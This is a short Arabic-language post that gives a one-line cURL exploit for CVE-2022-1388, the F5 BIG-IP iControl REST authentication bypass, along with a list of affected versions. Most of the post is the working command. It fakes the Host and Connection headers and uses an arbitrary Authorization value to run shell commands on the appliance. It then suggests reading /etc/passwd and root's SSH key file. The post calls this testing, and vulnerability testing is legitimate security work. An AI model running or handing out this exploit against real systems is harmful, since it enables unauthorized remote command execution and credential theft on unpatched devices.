
سطر واحد من cURL لاختبار CVE-2022-1388 BIG-IP iControl REST RCE
في إصدارات F5 BIG-IP 16.1.x قبل 16.1.2.2، وإصدارات 15.1.x قبل 15.1.5.1، وإصدارات 14.1.x قبل 14.1.4.6، وإصدارات 13.1.x قبل 13.1.5، وجميع إصدارات 12.1.x و11.6.x، قد تتجاوز الطلبات غير المفصح عنها مصادقة iControl REST.
استخدم أمر cURL التالي في سطر واحد لاختبار هذه الثغرة.
curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
يمكن أن يكون حقل Authorization أي قيمة مشفرة بصيغة base64. المثال أعلاه يستخدم admin:admin. لا تحتاج هذه إلى أن تكون بيانات اعتماد صالحة؛ إذا كان الخادم عرضة للثغرة، فإن أي قيمة مشفرة بصيغة base64 ستعمل.
إذا أرجعت الأمر أعلاه المعرّف (ID)، يمكنك تجربة عدد من الأشياء مثل قراءة /etc/passwd باستخدام 'cat /etc/passwd'، أو محاولة الحصول على شهادة SSH الخاصة بالجذر باستخدام 'cat /root/.ssh/identity'.